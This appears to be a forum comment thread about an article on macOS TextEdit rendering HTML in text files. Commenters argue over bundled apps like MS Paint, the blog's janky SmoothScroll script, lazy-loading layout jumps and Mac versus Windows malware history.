I too have been annoyed to not have a simple bundled paint program (I remember MacPaint!), but bundled application software is not really what determines whether an OS is a decent desktop OS.
I actually strongly disagree. Bundled applications which I don’t use and/or will replace with more powerful third party options just add clutter. There’s a balance to be sure, but I generally think OS’s bundle too many apps!
Why would the quality of an OS be determined by what apps come bundled with it? An OS is a different thing than applications, it's what the applications run on. I think you have an unusual viewpoint.
Because people generally want their computer to be usable when they buy it. Imagine if OSes did not include a text editor, browser, file explorer, settings app, wifi connection tool, etc. MS paint is similarly a very basic part of the standard toolset.
One of the big reasons I switched in 2007 was the absence of absolute dreck like Paint.exe on a Mac. Instead, Apple focused on providing other types of apps for free, and now macOS comes with a full office suite and a prosumer sound editing program as things Windows doesn't have on first launch. Out of the box, macOS offers so much stuff today it's kind of incredible.
You want to draw? Use Notes, which has very little but enough to draw a quick idea you just had.
mspaint.exe is as close to perfect software as I have ever seen. I'm curious to know which program you think is better, because I'm sure very few exist.
You can’t really start with a blank canvas and fill it in. You can only edit an existing image. (Yes, if you can create an all white JPEG you’ve more or less reinvented paint.)
It can sort of hackily fill some extremely basic functions (I know 'cause I do it too), but even that is pretty hacky - like, how do you create a new blank document 800px by 600px to start painting on?
oh come on, how much more do you need than a crayon based color picker? ever set the date of your system to waaay into the future and then look at the crayon color picker? after providing that, what else could you possibly need?
Just like a box of crayons. When they are new, all of the labels are crisp and clean, and the edges of the crayons are square/flat. After using the crayons, the tips become rounded, and you have to peel the labels back as the crayon wears down.
So does the crayon color picker. At least it did in older versions of the OS. Haven't looked at it in a really long time, as it was definitely a gimmick more than function.
Oh, what do you know, Apple is using the same shitty playbook that Microsoft used and outgrew from the '90s. Remember when opening and interpreting everything by default was the source of all kinds of malware, because Microsoft thought usability/convenience must trump security? I remember. Nowadays they've toned that down: no more macros enabled by default, no more default autoplay, no more automatically opening mail attachments in Outlook, and Notepad definitely doesn't interpret HTML tags in anything you throw at it, including .html files.
To the author: This website seems to use something called SmoothScroll (edit: a javascript library) which makes my scrolling really really jumpy/janky. I'm using chrome on a MacBook with the touchpad. Made it basically impossible to scroll around the page which in turn made it very difficult for me to read the article.
"Please don't complain about website formatting, back-button breakage, and similar annoyances. They're too common to be interesting. Exception: when the author is present. Then friendly feedback might be helpful."
(Note: I'm not saying such things aren't annoying—it's the opposite—which is why we need a site guideline to prevent discussions from being dominated by them.)
Also to the author: This is most likely costing you readers.
Just weighing the pros and cons here:
Pro: People who don't have smooth-scrolling mice will suddenly enjoy smooth scrolling on this website. Even this is a questionable "pro". Most people have scrolling set up how they want it and don't need it fixed on a per-website basis.
Con: Degrading a core function of the computer (scrolling) for people who already have smooth scrolling.
So to summarize: The plugin is not helping anyone read the blog, but it is preventing/annoying many people from reading it.
It's not really rare. Chrome tends to be a bit more "adventurous" and experimental, while Safari and Firefox are a bit more conservative. So it's not uncommon to see a few weird issues show up in Chrome.
Messing with native scrolling as a web antipattern is right up there with interfering with copy and paste. I will never understand why people do these things.
My first web development job was for a Rails consultancy whose owner explicitly stated that our apps were not designed to support using the back button. On another occasion, this same person responded to user reports of page zooming breaking the site with a counter of "then don't zoom the page".
These moments were two of the first wherein I strongly reconsidered whether I had made the right career choices.
The browsers cannot control a dev that uses AJAX to continually redraw the page without causing the browser to update the history/location. Typically a sign of a) a dev new to AJAX or b) a solo dev who created a PoC that got turned into a product with very little thought about things like history/state/etc. I myself am an option B person.
Basically every single big site screws this up when lazy loading content - Twitter, YouTube, etc. If I drag down the scrollbar to position content where I want it on the page, invariably content gets loaded and pushed to the page. Because I am fixing the scrollbar by holding down the mouse button, the page jumps to a new position.
It is infuriating because this is solvable in many ways, the simplest being not to push content during a mouseDown event.
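On the CSS side, reserving the final dimensions for lazy content (and not defeating the browser's built-in scroll anchoring) avoids the jump entirely; a sketch with made-up class names:

```css
/* Reserve the loaded size up front so late-arriving content
   doesn't push the page around. Class names are illustrative. */
.lazy-thumb {
  aspect-ratio: 16 / 9;  /* box keeps its final shape while loading */
  width: 100%;
}
/* Leave the browser's scroll anchoring enabled (this is the default): */
.feed { overflow-anchor: auto; }
```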
But my new most hated thing is Google lazy showing details when I mouse over a result. Which means if I quickly go to click on the second link I mouse past the first link and it expands to the space where the second link was, so I either click the wrong link or have to reorient and then click the second link. I can't imagine how or why that feature exists.
I'm using Chrome and Windows 10 but also got unpleasant behavior. I can't quite tell what's going on for multiple pushes of the scroll wheel, but one 'tick' would push the page a set amount, and then a moment later the movement was repeated (but without the prompting input). Adds up to kind of a 'gross' overall feeling when scrolling.
EDIT: when scrolling with the arrow keys it looks like there's an attempt at 'smoothing', but it really feels more like inertia and damping and is pretty unpleasant.
That this behavior is called "SmoothScroll" is what pushes it over the boundary for me, firmly into self-satire (and so I am in stitches from laughing so hard at your great description and then experiencing the actual behavior); who writes these scripts, and why? :(
Works fine on Firefox for me. On the other hand, the text is in a small and thin font, light gray on a white background making it unreadable on my screen. Reader mode to the rescue, once again.
I wonder if there is an Apple backdoor to read users' text files when they open them and send the saucier things back to them. We will probably never know, as this could be collated with other stuff and sent with metrics.
Small thing I do first when a new Windows has been installed: make the file association of .VBS and .JS files open with Notepad instead of wscript.exe[0]
Mitigates `iloveyou`[1] virus type attacks on my system
The response, for the longest time, from a lot of MacOS users was that "Macs can't get viruses." Thanks, in large part, to Apple's own advertising.
This led to decades of bad online practices on the part of Mac users, thinking that by virtue of using an Apple computer, they were immune to such attacks they deemed exclusive to 'viruses.' Malware was for someone else, they'd argue. Because they don't get viruses, they were fine.
As a result, one of the largest botnets for a time was a MacOS one. Flashback.
The headline isn't needlessly dramatic. It's dramatic enough to prove a point. Bad habits and a lack of safe file handling are the most guaranteed way one opens oneself up to attack vectors such as the one demonstrated in the article.
I disagree. Many of Apple's user-base believes that the platform is immune from viruses and malware. It's important to get the message out that it's no better (and may be worse) than other popular platforms. Especially since Apple claims their platform is "secure by design."
Safety by virtue of running MacOSX isn't enough anymore. Not that I'd argue it ever was totally safe/enough in the first place.
Bad habits are what subject one to attacks more than anything else... and that's basically what Apple cultivated in their users through ignorance of threat mechanisms.
>Bad habits are what subject one to attacks more than anything else... and that's basically what Apple cultivated in their users through ignorance of threat mechanisms.
This. 100 times this. The end user is the weakest link in your security chain, and the way Apple implements abstraction in MacOS makes it really difficult for the end user to understand what exactly they're doing, and what effect it has on their overall security.
Most of the safety has always been in being a minority platform, and consequently I don't think the threat level has really changed all that much over the past ten years. Apple are really hitting the gas right now with their SIP work and the immutable OS volume and such.
Windows has a good handful of security vulnerabilities, but you'd be surprised by how few people actually "target" Windows devices. Windows still has accountability to their enterprise users, which means they spend most of their time mitigating the more serious stuff rather than some infected exe you'll find floating around the internet. macOS and its Unix heritage make it a pretty interesting case study for hackers, and while it may not have the perceived "hackability" of a Windows box, the severity of a macOS exploit can vary greatly. Not to mention, Apple's reluctance to work with security researchers and opaque development cycle only make it harder for the end user to ascertain what impact macOS has on their personal security.
I use neither of these operating systems on a daily basis, but I think you'd be surprised by how secure Windows is these days. It's by no means perfect, but it does a pretty good job of staying secure, even as the #1 desktop operating system in the world. Now if only Microsoft could make a secure desktop that was any good... wishful thinking.
Wow. I would have expected Android to be so much higher. For all the poorest people in the world who never owned a computer and have Internet access through an Android device, this is a great statistic.
Windows has a very good built-in antivirus now that protects you from pretty much all but 0-day vulnerabilities.
Really, I don't think you can draw any big comparisons here nowadays - Apple's security on macOS is sandboxing and signing, the latter of which power users will have turned off, and the former being inapplicable in this case.
How does something like this wind up on the front page? As of this comment, it was posted 48 minutes ago with 12 points, one other comment, and sits at number 5. It's a self-professed clickbait title, though the content is interesting.
where 1.5 is a number that may change from time to time without warning, perhaps now it's 1.6 or something like that.
The number of comments does not matter, unless the post has too much more comment than points, and the site adds a penalty.
There are a lot of automatic and manual penalties added by the mods, and also added by the flags of the users. Most of the details are part of the secret sauce and change from time to time without warning.
Why not? You yourself just said "though the content is interesting", and the title might be a little clickbaity, but it's not that bad. I've seen much worse reach the frontpage.